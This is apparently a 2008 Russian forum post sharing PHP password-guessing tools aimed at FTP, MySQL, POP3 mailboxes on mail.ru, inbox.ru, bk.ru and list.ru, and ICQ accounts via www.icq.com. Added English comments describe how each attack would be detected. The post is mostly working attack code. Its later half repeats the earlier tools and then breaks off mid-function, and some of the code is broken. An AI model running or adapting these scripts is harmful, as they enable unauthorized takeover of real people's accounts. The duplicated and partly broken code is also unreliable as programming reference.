XaCeRoC
07.07.2008, 12:38
Ftp brute
<?php
// Tries every login in login.txt with every password in passw.txt against one
// FTP server and appends each accepted pair to brute_save_ftp.txt.
// Defensive reading: all attempts are sent on the single control connection
// opened below, so the server would see a long run of failed logins inside one
// session; a cap on failed logins per connection, account lockout and
// per-source throttling bound this kind of guessing. login.txt, passw.txt and
// brute_save_ftp.txt next to a PHP script are the on-disk traces of the tool.
set_time_limit(0); // no execution time limit for the run
$host = "host.ru"; // target host
$port = 21; // target port
$uid_file = file("login.txt"); // file with login names
$pwd_file = file("passw.txt"); // file with passwords
$brute_save = fopen("brute_save_ftp.txt","a+"); // accepted accounts are appended here
$yes_connect = 0; // accepted logins
$no_connect = 0; // rejected logins
if($conn = @ftp_connect($host, $port)) { // "@" suppresses connection warnings
for($i=0; $i<count($uid_file); $i++) {
$login = trim($uid_file[$i]);
for($j=0; $j<count($pwd_file); $j++) {
$passwd = trim($pwd_file[$j]);
if($ftp_conn = @ftp_login($conn, $login, $passwd)) {
// Result line: date|HOST: ...|Login: ...|Password: ..., password in clear text.
fputs($brute_save, date("d.m.y H:i:s")."|HOST: ".$host."|Login: ".$login."|Password: ".$passwd."\r\n");
ftp_quit($conn); // closes the control connection
$yes_connect++;
}
else {
$no_connect++;
continue;
}
}
}
}
else {
// The server could not be reached: print a message and stop.
echo "<font face=Tahoma color=#444444 size=2>Не удалось установить связь с $host</font><br>";
exit();
}
// Print the two counters, then echo every line of the result file.
echo "<font face=Tahoma color=#444444 size=2>Удачных подключений: $yes_connect</font><br>";
echo "<font face=Tahoma color=red size=2>Неудачных попыток: $no_connect</font><br>";
$show_brute = file("brute_save_ftp.txt");
for($i=0; $i<count($show_brute); $i++) {
// Each stored line is split on "|"; the fields are printed without HTML escaping.
list($dates, $host, $login, $passwd) = explode("|", $show_brute[$i]);
echo "<font face=Tahoma color=#runthes size=2>[".$dates."][".$host."][".$login."][".$passwd."]</font><br>";
}
?>
SQL Brute
<?php
// Tries every login in login.txt with every password in passw.txt against a
// MySQL server through the legacy mysql_connect() API and appends each
// accepted pair to brute_save.txt.
// Defensive reading: each pair is a separate connection attempt, so the
// database host would see a burst of rejected connections from one source.
// Limiting which hosts can reach the port, restricting the host part of each
// account and delaying repeated failures bound this kind of guessing.
// login.txt, passw.txt and brute_save.txt are the on-disk traces of the tool.
$host = "localhost"; // host where MySQL runs
$port = "3306"; // MySQL port
$uid_file = file("login.txt"); // file with login names
$pwd_file = file("passw.txt"); // file with passwords
$brute_save = fopen("brute_save.txt","a+"); // accepted accounts are appended here
$yes_connect = 0; // accepted logins
$no_connect = 0; // rejected logins
for($i=0; $i<count($uid_file); $i++) {
$login = trim($uid_file[$i]);
for($j=0; $j<count($pwd_file); $j++) {
$passwd = trim($pwd_file[$j]);
if($conn = @mysql_connect($host.":".$port, $login, $passwd)) { // "@" suppresses the access-denied warning
flock($brute_save, 3); // 3 is the value of LOCK_UN
// Result line: date|HOST: ...|Login: ...|Password: ..., password in clear text.
fputs($brute_save, date("d.m.y H:i:s")."|HOST: ".$host."|Login: ".$login."|Password: ".$passwd."\r\n");
flock($brute_save, 1); // 1 is the value of LOCK_SH
mysql_close($conn);
$yes_connect++;
}
else {
$no_connect++;
continue;
}
}
}
// Print the two counters, then echo every line of the result file.
echo "<font face=Tahoma color=#444444 size=2>Удачных подключений: $yes_connect</font><br>";
echo "<font face=Tahoma color=red size=2>Неудачных попыток: $no_connect</font><br>";
$show_brute = file("brute_save.txt");
for($i=0; $i<count($show_brute); $i++) {
// Each stored line is split on "|"; the fields are printed without HTML escaping.
list($dates, $host, $login, $passwd) = explode("|", $show_brute[$i]);
echo "<font face=Tahoma color=#runthes size=2>[".$dates."][".$host."][".$login."][".$passwd."]</font><br>";
}
?>
Mail Brute
brute_mail.php
<?php
// Nested loops over user_mail.txt and user_passwd.txt that create a new
// pop3_class object, pointed at pop3.mail.ru, for each pair and call Open()
// and Login() on it. pop3_class is loaded from ./pop3.php.
// Defensive reading: the POP3 class uses port 110 without TLS and one
// connection per pair, so the mail server would see many short sessions with
// failed USER/PASS exchanges; per-account and per-source limits on failed
// logins bound this kind of guessing.
set_time_limit(0); // no execution time limit for the run
$user_login = file("user_mail.txt"); // list of mailbox names
$uesr_passwd = file("user_passwd.txt"); // list of passwords
$apop = 0; // passed to Login(); 0 selects the USER/PASS exchange instead of APOP
include_once("./pop3.php");
for($i=0; $i<count($user_login); $i++) {
$u_login = trim($user_login[$i]);
for($j=0; $j<count($user_passwd); $j++) {
$u_passwd = trim($user_passwd[$j]);
$pop3_connection = new pop3_class;
$pop3_connection->hostname = "pop3.mail.ru";
if($pop3_connection->Open()) {
if($pop3_connection->Login($u_login, $u_passwd, $apop)) {
echo "Congritulation!";
$pop3_connection->Close();
}
else {
echo "SHIT";
}
}
else {
echo "Failed!";
exit();
}
}
}
?>
pop3.php
<?
// Minimal POP3 client. It speaks plain-text POP3 over a socket opened with
// fsockopen() (default port 110); nothing in the class sets up TLS, so the
// USER/PASS exchange is sent in clear text. $user, $password and $message are
// interpolated into command lines as given, with no CR/LF filtering.
// Most methods return "" on success and an error string on failure.
class pop3_class
{
var $hostname=""; // server name, must be set before Open()
var $port=110; // POP3 port
var $connection=0; // socket handle, 0 while closed
var $state="DISCONNECTED"; // DISCONNECTED, AUTHORIZATION or TRANSACTION
var $greeting=""; // text after "+OK" in the server greeting, used by APOP
var $must_update=0; // set by DeleteMessage(); makes Close() send QUIT
// Reads from the socket in chunks of up to 99 bytes until the buffer ends with
// CRLF and returns the line without the CRLF; returns 0 at end of stream.
// NOTE(review): the for(...) header below is incomplete in this copy of the file.
Function GetLine()
{
for($line="";
{
if(feof($this->connection))
return(0);
$line.=fgets($this->connection,100);
$length=strlen($line);
if($length>=2
&& substr($line,$length-2,2)=="\r\n")
return(substr($line,0,$length-2));
}
}
// Sends one command line terminated with CRLF; returns the fputs() result.
Function PutLine($line)
{
return(fputs($this->connection,"$line\r\n"));
}
// Opens the socket. Returns "" unless the hostname is empty or fsockopen()
// returned one of the negative codes listed below.
// NOTE(review): a false return from fsockopen() matches none of the cases and
// takes the default branch; "$hostname" in the -4 message is a local variable
// that this method never sets (the property is $this->hostname).
Function OpenConnection()
{
if($this->hostname=="")
return("2 it was not specified a valid hostname");
switch(($this->connection=fsockopen($this->hostname,$this->port)))
{
case -3:
return("-3 socket could not be created");
case -4:
return("-4 dns lookup on hostname \"$hostname\" failed");
case -5:
return("-5 connection refused or timed out");
case -6:
return("-6 fdopen() call failed");
case -7:
return("-7 setvbuf() call failed");
default:
return("");
}
}
// Closes the socket if one is open and resets the handle to 0.
Function CloseConnection()
{
if($this->connection!=0)
{
fclose($this->connection);
$this->connection=0;
}
}
// Connects, reads the greeting and requires it to start with "+OK".
// On success the rest of the greeting is kept in $this->greeting and the
// state becomes AUTHORIZATION.
Function Open()
{
if($this->state!="DISCONNECTED")
return("1 a connection is already opened");
if(($error=$this->OpenConnection())!="")
return($error);
$this->greeting=$this->GetLine();
if(GetType($this->greeting)!="string"
|| strtok($this->greeting," ")!="+OK")
{
$this->CloseConnection();
return("3 POP3 server greeting was not found");
}
// strtok() continues on the greeting tokenized above: this is the text after "+OK ".
$this->greeting=strtok("\r\n");
$this->must_update=0;
$this->state="AUTHORIZATION";
return("");
}
// Ends the session. QUIT is sent only when $must_update is set; otherwise the
// socket is closed without it. The state returns to DISCONNECTED.
Function Close()
{
if($this->state=="DISCONNECTED")
return("no connection was opened");
if($this->must_update)
{
if($this->PutLine("QUIT")==0)
return("Could not send the QUIT command");
$response=$this->GetLine();
if(GetType($response)!="string")
return("Could not get quit command response");
if(strtok($response," ")!="+OK")
return("Could not quit the connection: ".strtok("\r\n"));
}
$this->CloseConnection();
$this->state="DISCONNECTED";
return("");
}
// Authenticates in the AUTHORIZATION state. With $apop set it sends APOP with
// md5(greeting . password); otherwise it sends USER and then PASS with the
// password in clear text. On success the state becomes TRANSACTION.
Function Login($user,$password,$apop)
{
if($this->state!="AUTHORIZATION")
return("connection is not in AUTHORIZATION state");
if($apop)
{
if($this->PutLine("APOP $user ".md5($this->greeting.$password))==0)
return("Could not send the APOP command");
$response=$this->GetLine();
if(GetType($response)!="string")
return("Could not get APOP login command response");
if(strtok($response," ")!="+OK")
return("APOP login failed: ".strtok("\r\n"));
}
else
{
if($this->PutLine("USER $user")==0)
return("Could not send the USER command");
$response=$this->GetLine();
if(GetType($response)!="string")
return("Could not get user login entry response");
if(strtok($response," ")!="+OK")
return("User error: ".strtok("\r\n"));
if($this->PutLine("PASS $password")==0)
return("Could not send the PASS command");
$response=$this->GetLine();
if(GetType($response)!="string")
return("Could not get login password entry response");
if(strtok($response," ")!="+OK")
return("Password error: ".strtok("\r\n"));
}
$this->state="TRANSACTION";
return("");
}
// Sends STAT and parses the two numbers of the reply into $messages and $size.
// NOTE(review): both parameters are taken by value in this copy, so the
// assignments below are not visible to the caller.
Function Statistics($messages,$size)
{
if($this->state!="TRANSACTION")
return("connection is not in TRANSACTION state");
if($this->PutLine("STAT")==0)
return("Could not send the STAT command");
$response=$this->GetLine();
if(GetType($response)!="string")
return("Could not get the statistics command response");
if(strtok($response," ")!="+OK")
return("Could not get the statistics: ".strtok("\r\n"));
$messages=strtok(" ");
$size=strtok(" ");
return("");
}
// Sends UIDL (when $unique_id is set) or LIST. With $message == "" it returns
// an array indexed by message number; otherwise it returns the second number
// of the single-line reply. Errors are returned as strings.
// NOTE(review): the inner for(...) header is incomplete in this copy of the file.
Function ListMessages($message,$unique_id)
{
if($this->state!="TRANSACTION")
return("connection is not in TRANSACTION state");
if($unique_id)
$list_command="UIDL";
else
$list_command="LIST";
if($this->PutLine("$list_command $message")==0)
return("Could not send the $list_command command");
$response=$this->GetLine();
if(GetType($response)!="string")
return("Could not get message list command response");
if(strtok($response," ")!="+OK")
return("Could not get the message listing: ".strtok("\r\n"));
if($message=="")
{
for($messages=array();
{
$response=$this->GetLine();
if(GetType($response)!="string")
return("Could not get message list response");
if($response==".") // a lone "." ends the multi-line reply
break;
$message=intval(strtok($response," "));
if($unique_id)
$messages[$message]=strtok(" ");
else
$messages[$message]=intval(strtok(" "));
}
return($messages);
}
else
{
$message=intval(strtok(" "));
return(intval(strtok(" ")));
}
}
// Sends RETR when $lines is negative, otherwise TOP with $lines, and reads the
// reply into $headers (up to the first empty line) and $body (the rest).
// A leading "." on a line is removed; a lone "." ends the message.
// NOTE(review): $headers and $body are taken by value in this copy, so the
// collected lines are not visible to the caller.
Function RetrieveMessage($message,$headers,$body,$lines)
{
if($this->state!="TRANSACTION")
return("connection is not in TRANSACTION state");
if($lines<0)
{
$command="RETR";
$arguments="$message";
}
else
{
$command="TOP";
$arguments="$message $lines";
}
if($this->PutLine("$command $arguments")==0)
return("Could not send the $command command");
$response=$this->GetLine();
if(GetType($response)!="string")
return("Could not get message retrieval command response");
if(strtok($response," ")!="+OK")
return("Could not retrieve the message: ".strtok("\r\n"));
// Header section.
for($headers=$body=array(),$line=0;;$line++)
{
$response=$this->GetLine();
if(GetType($response)!="string")
return("Could not retrieve the message");
switch($response)
{
case ".":
return("");
case "":
break 2; // empty line: leave the switch and the for loop, headers are done
default:
if(substr($response,0,1)==".")
$response=substr($response,1,strlen($response)-1);
break;
}
$headers[$line]=$response;
}
// Body section.
for($line=0;;$line++)
{
$response=$this->GetLine();
if(GetType($response)!="string")
return("Could not retrieve the message");
switch($response)
{
case ".":
return("");
default:
if(substr($response,0,1)==".")
$response=substr($response,1,strlen($response)-1);
break;
}
$body[$line]=$response;
}
return("");
}
// Sends DELE for one message and sets $must_update so that Close() sends QUIT.
Function DeleteMessage($message)
{
if($this->state!="TRANSACTION")
return("connection is not in TRANSACTION state");
if($this->PutLine("DELE $message")==0)
return("Could not send the DELE command");
$response=$this->GetLine();
if(GetType($response)!="string")
return("Could not get message delete command response");
if(strtok($response," ")!="+OK")
return("Could not delete the message: ".strtok("\r\n"));
$this->must_update=1;
return("");
}
// Sends RSET and clears $must_update.
Function ResetDeletedMessages()
{
if($this->state!="TRANSACTION")
return("connection is not in TRANSACTION state");
if($this->PutLine("RSET")==0)
return("Could not send the RSET command");
$response=$this->GetLine();
if(GetType($response)!="string")
return("Could not get reset deleted messages command response");
if(strtok($response," ")!="+OK")
return("Could not reset deleted messages: ".strtok("\r\n"));
$this->must_update=0;
return("");
}
// Sends NOOP and checks for a "+OK" reply.
Function IssueNOOP()
{
if($this->state!="TRANSACTION")
return("connection is not in TRANSACTION state");
if($this->PutLine("NOOP")==0)
return("Could not send the NOOP command");
$response=$this->GetLine();
if(GetType($response)!="string")
return("Could not NOOP command response");
if(strtok($response," ")!="+OK")
return("Could not issue the NOOP command: ".strtok("\r\n"));
return("");
}
};
PHP Simple mail.ru brute
<html>
<head>
<title>MailBrute By Joker-jar</title>
<meta http-equiv=Content-Type content="text/html; charset=windows-1251">
</head>
<body>
<?
// Run-time settings and configuration of the page.
// Defensive reading: the three calls below make the request run without a
// time limit, keep running after the browser disconnects and hide all errors,
// so on the hosting side this shows up as a long-lived PHP request holding
// outbound connections to port 110. pass.txt, good.txt and bad.txt are the
// on-disk traces of the tool.
set_time_limit(0);
ignore_user_abort(1);
error_reporting(0);
// Allow-list of POP3 servers; the posted "popserver" value is used as the key.
$servers = Array(
"mail" => "pop3.mail.ru",
"inbox" => "pop3.inbox.ru",
"bk" => "pop3.bk.ru",
"list" => "pop3.list.ru",
);
$pop3port = 110; // plain-text POP3 port
$passfile = "pass.txt"; // dictionary of candidate passwords
$good = "good.txt"; // accepted name/password pair is appended here
$bad = "bad.txt"; // every rejected candidate is appended here
// Tests one username/password pair against a POP3 server. Returns true only
// when the reply to "pass" starts with "+" and is longer than 3 bytes; returns
// false for a failed connection, an unexpected greeting, a rejected user or a
// rejected password alike.
// A new TCP connection (30 s connect timeout) is opened on $pop3port for every
// call and the credentials are sent in clear text.
function CheckPass($pop3server, $username, $pass)
{
global $pop3port;
$fp = fsockopen($pop3server, $pop3port, $errno, $errstr, 30);
if (!$fp)
return false;
$buf = fgets($fp, 128); // server greeting
if ($buf[0] != "+")
{
fclose($fp);
return false;
}
fputs($fp,"user ".$username."\r\n");
$buf = fgets($fp, 128); // reply to "user"
if ($buf[0] != "+")
{
fclose($fp);
return false;
}
fputs($fp,"pass ".$pass."\r\n");
$buf = fgets($fp, 128); // reply to "pass"
if (strlen($buf) > 3 && $buf[0] == "+")
{
fclose($fp);
return true;
}
fclose($fp);
return false;
}
// Builds a string made of $l copies of the first character of $alf.
// Returns "" when $l is zero or negative.
function genstr($l, $alf)
{
    $filled = "";
    for ($count = 0; $count < $l; ++$count) {
        $filled = $filled . $alf[0];
    }
    return $filled;
}
// Returns the string that follows $p when $p is read as a counter over the
// alphabet $alf with the lowest-order position first: the first position that
// is not at the last alphabet character is advanced by one, every position
// before it is reset to the first character, and when all positions are at
// the last character the string grows by one first character.
function nextpass($p, $alf)
{
    $lastIndex = strlen($alf) - 1;
    $pos = 0;
    while ($pos < strlen($p)) {
        $found = strpos($alf, $p[$pos]);
        if ($found != $lastIndex) {
            // Not at the end of the alphabet: advance this position and stop.
            $p[$pos] = $alf[$found + 1];
            return $p;
        }
        // At the end of the alphabet: wrap this position and carry on.
        $p[$pos] = $alf[0];
        $pos++;
    }
    return $p . $alf[0];
}
// Form handler: runs only when the form was posted. It validates the inputs
// and then tries passwords for the account $_POST["name"] on the chosen
// server, either generated from the posted alphabet or read from $passfile.
// Every rejected candidate is appended in clear text to $bad, a match to
// $good, and the script exits on the first match. CheckPass() opens a new
// connection per candidate, so the mail server would see a steady series of
// failed logins for a single account; per-account and per-source limits on
// failed logins bound this kind of guessing.
if (isset($_POST["name"]))
{
if ($_POST["name"] === "")
{
echo "Отсутствует имя</body></html>";
exit;
}
// The posted server key must exist in the $servers allow-list.
if (!isset($servers[$_POST["popserver"]]))
{
echo "Неправильно задан pop3 сервер</body></html>";
exit;
}
// Both lengths are cast to int; zero or max < min is rejected.
settype($_POST["minl"],"int");
settype($_POST["maxl"],"int");
if ($_POST["minl"] == 0 || $_POST["maxl"] == 0 || $_POST["maxl"] - $_POST["minl"] < 0)
{
echo "Ошибка в параметрах длины пароля</body></html>";
exit;
}
if ($_POST["dict"] !== "yes" && $_POST["alf"] === "")
{
echo "Алфавит пуст</body></html>";
exit;
}
if ($_POST["dict"] === "yes" && (!file_exists($passfile) || filesize($passfile) == 0))
{
echo "Файл $passfile пуст или отсутствует</body></html>";
exit;
}
if ($_POST["dict"] !== "yes")
{
// Exhaustive search
// Starts at minl copies of the first alphabet character and stops when the
// candidate equals maxl+1 copies of it.
$startpass = genstr($_POST["minl"],$_POST["alf"]);
$endpass = genstr($_POST["maxl"]+1,$_POST["alf"]);
$curpass = $startpass;
while ($curpass != $endpass)
{
if (CheckPass($servers[$_POST["popserver"]], $_POST["name"], $curpass))
{
$f = fopen($good, 'ab');
fwrite($f, $_POST["name"]." : ".$curpass."\r\n");
fclose($f);
exit;
}
else
{
$f = fopen($bad, 'ab');
fwrite($f, $_POST["name"]." : ".$curpass."\r\n");
fclose($f);
}
$curpass = nextpass($curpass,$_POST["alf"]);
}
}
else
{
// Dictionary attack
$passes = file($passfile);
for($i=0; $i<count($passes);$i++)
{
$curpass = trim($passes[$i]);
if (CheckPass($servers[$_POST["popserver"]], $_POST["name"], $curpass))
{
$f = fopen($good, 'ab');
fwrite($f, $_POST["name"]." : ".$curpass."\r\n");
fclose($f);
exit;
}
else
{
$f = fopen($bad, 'ab');
fwrite($f, $_POST["name"]." : ".$curpass."\r\n");
fclose($f);
}
}
}
}
?>
<fieldset style="width: 500">
<legend>Параметры брута</legend>
<form method="POST">
<table border="0">
<tr><td>
<input type="text" name="name" style="width: 100">
</td><td>@
<select name="popserver" style="width: 100">
<option value="mail" selected>mail.ru
<option value="inbox">inbox.ru
<option value="bk">bk.ru
<option value="list">list.ru
</select>
</td></tr>
<tr><td colspan="2"><br>
<input type="radio" name=dict value="yes" checked>Атака по словарю pass.txt<br>
<input type="radio" name=dict value="no">Атака полным перебором
</td></tr>
<tr><td style="text-align: right">
алфавит:
</td><td>
<input type="text" name="alf" style="width: 200" value="abcdefghijklmnopqrstuvwxyz">
</td></tr>
<tr><td style="text-align: right">
мин длина:
</td><td>
<input type="text" name="minl" style="width: 50" value="1">
</td></tr>
<tr><td style="text-align: right">
макс длина:
</td><td>
<input type="text" name="maxl" style="width: 50" value="5">
</td></tr>
<tr><td colspan="2">
<br>
<input type="submit" value="Начать брут и идти спать">
</td></tr>
</table>
</form>
</fieldset>
</body>
</html>
Artix ICQ phpBrute
<!DOCTYPE HTML PUBLIC "-//W3C//DTD HTML 4.01 Transitional//EN"
"http://www.w3.org/TR/html4/loose.dtd">
<html>
<head>
<title>Artix ICQ phpBrute</title>
<meta http-equiv="Content-Type" content="text/html; charset=windows-1251">
</head>
<body>
<?
/// Reads "uin;password" lines from ./pass.txt, posts each pair to a login form
/// on www.icq.com over plain HTTP and records the pairs whose response passes
/// the cookie check below. Progress is written to ./stat.html every 10th line.
/// Defensive reading: the request is hand-built and constant apart from the
/// form body - POST /karma/login.php, the User-Agent value "Opera 7.50rulez"
/// (the two concatenations below have no CRLF between them), Referer
/// http://yandex.ru/ and a new connection per attempt - so it can be matched
/// in web-server logs and rate-limited per source. ./pass.txt, ./.htgood.txt
/// and ./stat.html are the on-disk traces of the tool.
/// Let the script run without a time limit
set_time_limit(0);
/// Report all errors except notices
Error_Reporting(E_ALL & ~E_NOTICE);
/// Constants, please do not change
$config=array();
$config['good']='./.htgood.txt'; /// Valid numbers are stored here (the .ht prefix is recommended so that the file cannot be read over the web)
$config['pass']='./pass.txt'; /// Password list
$config['separator']=';'; /// Separator in "uin;pass" lines
$config['host']='www.icq.com'; /// HTTP server of the ICQ service
$config['port']=80; /// HTTP port
$config['statfile']='./stat.html'; /// Status file
/// If a run is already in progress, show its result
if(file_exists($config['statfile']))
{
include($config['statfile']);
echo '
</body>
</html>';
exit();
}
/// Pretend to be a browser
$request = "POST /karma/login.php HTTP/1.1\r\n";
$request .= "Host: ".$config['host']." \r\n";
$request .= "User-Agent: Opera 7.50";
$request .= "rulez\r\n";
$request .= "Keep-Alive: 300\r\n";
$request .= "Connection: keep-alive\r\n";
$request .= "Referer: http://yandex.ru/ \r\n";
/// Counters of bad and good UINs
$goodcount=0;
$badcount=0;
/// Open the password file
$pass=file($config['pass']);
/// The guessing loop itself
for($i=0;$i<count($pass);$i++)
{
list($s,$s1)=explode($config['separator'],$pass[$i]);
/// Form data sent to the server
$posts = array ( 'dest' => '/whitepages/user_details.php',
'desc' => '',
'service' => '20',
'css'=> 'whitepages',
'uin_email'=> $s,
'password' => trim($s1)
);
$postValues="";
$s=''; // $s is reused from here on as the response buffer
/// URL-encoding
foreach( $posts AS $name => $value )
{
$postValues .= urlencode($name) . "=" . urlencode($value) . '&';
}
/// Build the POST request
$lenght = strlen($postValues);
$request2 = $request."Content-Type: application/x-www-form-urlencoded\r\n";
$request2 .= "Content-Length: $lenght\r\n";
$request2 .= "\r\n";
$request2 .= $postValues;
/// Open the socket
$fp = fsockopen($config['host'],$config['port'], $errno, $errstr, 30);
if (!$fp)
{
/// In case of an error
echo "$errstr ($errno)<br />\n";
}
else
{
/// Send the data to whitepages
fwrite($fp, $request2);
while (!feof($fp))
{
$s.=fgets($fp, 128);
}
}
/// Close the socket
fclose($fp);
/// If the account logged in, whitepages sends cookies, which is what we catch. The whole page is not downloaded
// The search string is partly masked with asterisks as it appears on this page.
if(strpos($s,'Set-C*****')==true)
{
$good=fopen($config['good'],'a');
fwrite($good,$pass[$i]);
fclose($good);
$goodcount++;
}
else $badcount++;
if($i%10==0)
{
$count=count($pass)-$i;
/// Update the statistics
$s=<<<HTML
--------------------------<br>
<b>Artix ICQ phpBrute</b> <br>
--------------------------<br>
Хороших: $goodcount<br>
Плохих: $badcount<br>
Осталось: $count<br>
---<br>
HTML;
$stat=fopen($config['statfile'],'w+');
fwrite($stat,$s);
fclose($stat);
}
}
$s=<<<HTML
--------------------------<br>
<b>Artix ICQ phpBrute</b> <br>
--------------------------<br>
Работа завершена. <br>
Хороших: $goodcount<br>
Плохих: $badcount<br>
Для продолжения, удалите файл со статистикой<br>
---<br>
HTML;
/// Write the final result to the file
$stat=fopen($config['statfile'],'w+');
fwrite($stat,$s);
fclose($stat);
/// Run finished
?>
©Tyson
<?php
// Tries every login in login.txt with every password in passw.txt against one
// FTP server and appends each accepted pair to brute_save_ftp.txt.
// Defensive reading: all attempts are sent on the single control connection
// opened below, so the server would see a long run of failed logins inside one
// session; a cap on failed logins per connection, account lockout and
// per-source throttling bound this kind of guessing. login.txt, passw.txt and
// brute_save_ftp.txt next to a PHP script are the on-disk traces of the tool.
set_time_limit(0); // no execution time limit for the run
$host = "host.ru"; // target host
$port = 21; // target port
$uid_file = file("login.txt"); // file with login names
$pwd_file = file("passw.txt"); // file with passwords
$brute_save = fopen("brute_save_ftp.txt","a+"); // accepted accounts are appended here
$yes_connect = 0; // accepted logins
$no_connect = 0; // rejected logins
if($conn = @ftp_connect($host, $port)) { // "@" suppresses connection warnings
for($i=0; $i<count($uid_file); $i++) {
$login = trim($uid_file[$i]);
for($j=0; $j<count($pwd_file); $j++) {
$passwd = trim($pwd_file[$j]);
if($ftp_conn = @ftp_login($conn, $login, $passwd)) {
// Result line: date|HOST: ...|Login: ...|Password: ..., password in clear text.
fputs($brute_save, date("d.m.y H:i:s")."|HOST: ".$host."|Login: ".$login."|Password: ".$passwd."\r\n");
ftp_quit($conn); // closes the control connection
$yes_connect++;
}
else {
$no_connect++;
continue;
}
}
}
}
else {
// The server could not be reached: print a message and stop.
echo "<font face=Tahoma color=#444444 size=2>Не удалось установить связь с $host</font><br>";
exit();
}
// Print the two counters, then echo every line of the result file.
echo "<font face=Tahoma color=#444444 size=2>Удачных подключений: $yes_connect</font><br>";
echo "<font face=Tahoma color=red size=2>Неудачных попыток: $no_connect</font><br>";
$show_brute = file("brute_save_ftp.txt");
for($i=0; $i<count($show_brute); $i++) {
// Each stored line is split on "|"; the fields are printed without HTML escaping.
list($dates, $host, $login, $passwd) = explode("|", $show_brute[$i]);
echo "<font face=Tahoma color=#runthes size=2>[".$dates."][".$host."][".$login."][".$passwd."]</font><br>";
}
?>
SQL Brute
<?php
// Tries every login in login.txt with every password in passw.txt against a
// MySQL server through the legacy mysql_connect() API and appends each
// accepted pair to brute_save.txt.
// Defensive reading: each pair is a separate connection attempt, so the
// database host would see a burst of rejected connections from one source.
// Limiting which hosts can reach the port, restricting the host part of each
// account and delaying repeated failures bound this kind of guessing.
// login.txt, passw.txt and brute_save.txt are the on-disk traces of the tool.
$host = "localhost"; // host where MySQL runs
$port = "3306"; // MySQL port
$uid_file = file("login.txt"); // file with login names
$pwd_file = file("passw.txt"); // file with passwords
$brute_save = fopen("brute_save.txt","a+"); // accepted accounts are appended here
$yes_connect = 0; // accepted logins
$no_connect = 0; // rejected logins
for($i=0; $i<count($uid_file); $i++) {
$login = trim($uid_file[$i]);
for($j=0; $j<count($pwd_file); $j++) {
$passwd = trim($pwd_file[$j]);
if($conn = @mysql_connect($host.":".$port, $login, $passwd)) { // "@" suppresses the access-denied warning
flock($brute_save, 3); // 3 is the value of LOCK_UN
// Result line: date|HOST: ...|Login: ...|Password: ..., password in clear text.
fputs($brute_save, date("d.m.y H:i:s")."|HOST: ".$host."|Login: ".$login."|Password: ".$passwd."\r\n");
flock($brute_save, 1); // 1 is the value of LOCK_SH
mysql_close($conn);
$yes_connect++;
}
else {
$no_connect++;
continue;
}
}
}
// Print the two counters, then echo every line of the result file.
echo "<font face=Tahoma color=#444444 size=2>Удачных подключений: $yes_connect</font><br>";
echo "<font face=Tahoma color=red size=2>Неудачных попыток: $no_connect</font><br>";
$show_brute = file("brute_save.txt");
for($i=0; $i<count($show_brute); $i++) {
// Each stored line is split on "|"; the fields are printed without HTML escaping.
list($dates, $host, $login, $passwd) = explode("|", $show_brute[$i]);
echo "<font face=Tahoma color=#runthes size=2>[".$dates."][".$host."][".$login."][".$passwd."]</font><br>";
}
?>
Mail Brute
brute_mail.php
<?php
// Nested loops over user_mail.txt and user_passwd.txt that create a new
// pop3_class object, pointed at pop3.mail.ru, for each pair and call Open()
// and Login() on it. pop3_class is loaded from ./pop3.php.
// Defensive reading: the POP3 class uses port 110 without TLS and one
// connection per pair, so the mail server would see many short sessions with
// failed USER/PASS exchanges; per-account and per-source limits on failed
// logins bound this kind of guessing.
set_time_limit(0); // no execution time limit for the run
$user_login = file("user_mail.txt"); // list of mailbox names
$uesr_passwd = file("user_passwd.txt"); // list of passwords
$apop = 0; // passed to Login(); 0 selects the USER/PASS exchange instead of APOP
include_once("./pop3.php");
for($i=0; $i<count($user_login); $i++) {
$u_login = trim($user_login[$i]);
for($j=0; $j<count($user_passwd); $j++) {
$u_passwd = trim($user_passwd[$j]);
$pop3_connection = new pop3_class;
$pop3_connection->hostname = "pop3.mail.ru";
if($pop3_connection->Open()) {
if($pop3_connection->Login($u_login, $u_passwd, $apop)) {
echo "Congritulation!";
$pop3_connection->Close();
}
else {
echo "SHIT";
}
}
else {
echo "Failed!";
exit();
}
}
}
?>
pop3.php
<?
// Minimal POP3 client. It speaks plain-text POP3 over a socket opened with
// fsockopen() (default port 110); nothing in the class sets up TLS, so the
// USER/PASS exchange is sent in clear text. $user, $password and $message are
// interpolated into command lines as given, with no CR/LF filtering.
// Most methods return "" on success and an error string on failure.
class pop3_class
{
var $hostname=""; // server name, must be set before Open()
var $port=110; // POP3 port
var $connection=0; // socket handle, 0 while closed
var $state="DISCONNECTED"; // DISCONNECTED, AUTHORIZATION or TRANSACTION
var $greeting=""; // text after "+OK" in the server greeting, used by APOP
var $must_update=0; // set by DeleteMessage(); makes Close() send QUIT
// Reads from the socket in chunks of up to 99 bytes until the buffer ends with
// CRLF and returns the line without the CRLF; returns 0 at end of stream.
// NOTE(review): the for(...) header below is incomplete in this copy of the file.
Function GetLine()
{
for($line="";
{
if(feof($this->connection))
return(0);
$line.=fgets($this->connection,100);
$length=strlen($line);
if($length>=2
&& substr($line,$length-2,2)=="\r\n")
return(substr($line,0,$length-2));
}
}
// Sends one command line terminated with CRLF; returns the fputs() result.
Function PutLine($line)
{
return(fputs($this->connection,"$line\r\n"));
}
// Opens the socket. Returns "" unless the hostname is empty or fsockopen()
// returned one of the negative codes listed below.
// NOTE(review): a false return from fsockopen() matches none of the cases and
// takes the default branch; "$hostname" in the -4 message is a local variable
// that this method never sets (the property is $this->hostname).
Function OpenConnection()
{
if($this->hostname=="")
return("2 it was not specified a valid hostname");
switch(($this->connection=fsockopen($this->hostname,$this->port)))
{
case -3:
return("-3 socket could not be created");
case -4:
return("-4 dns lookup on hostname \"$hostname\" failed");
case -5:
return("-5 connection refused or timed out");
case -6:
return("-6 fdopen() call failed");
case -7:
return("-7 setvbuf() call failed");
default:
return("");
}
}
// Closes the socket if one is open and resets the handle to 0.
Function CloseConnection()
{
if($this->connection!=0)
{
fclose($this->connection);
$this->connection=0;
}
}
// Connects, reads the greeting and requires it to start with "+OK".
// On success the rest of the greeting is kept in $this->greeting and the
// state becomes AUTHORIZATION.
Function Open()
{
if($this->state!="DISCONNECTED")
return("1 a connection is already opened");
if(($error=$this->OpenConnection())!="")
return($error);
$this->greeting=$this->GetLine();
if(GetType($this->greeting)!="string"
|| strtok($this->greeting," ")!="+OK")
{
$this->CloseConnection();
return("3 POP3 server greeting was not found");
}
// strtok() continues on the greeting tokenized above: this is the text after "+OK ".
$this->greeting=strtok("\r\n");
$this->must_update=0;
$this->state="AUTHORIZATION";
return("");
}
// Ends the session. QUIT is sent only when $must_update is set; otherwise the
// socket is closed without it. The state returns to DISCONNECTED.
Function Close()
{
